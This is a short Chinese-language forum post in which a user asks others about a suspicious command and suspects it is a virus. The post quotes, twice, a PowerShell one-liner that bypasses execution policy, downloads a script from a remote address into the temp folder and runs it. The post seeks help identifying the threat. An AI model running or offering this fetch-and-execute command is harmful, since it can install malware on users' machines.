← 返回列表

一个通过 irm 下载执行的 PowerShell 可疑脚本

楼层 1浏览 47 赞 0发于 2026-10-02 02:22最后回复 2026-10-02 02:22 原帖
Y
yangshu@yangshu#12026-10-02 02:2233 阅

大佬们,我发现一个可疑的命令
powershell -ExecutionPolicy Bypass "irm 35387519/123 -OutFile $env:temp\123.ps1 -UseBasicParsing;& $env:temp\123.ps1"powershell -ExecutionPolicy Bypass “irm 35387519/123 -OutFile $env:temp\123.ps1 -UseBasicParsing;& $env:temp\123.ps1”
看起来像是个病毒

本页 1 楼,抓取于 2026-10-07 14:02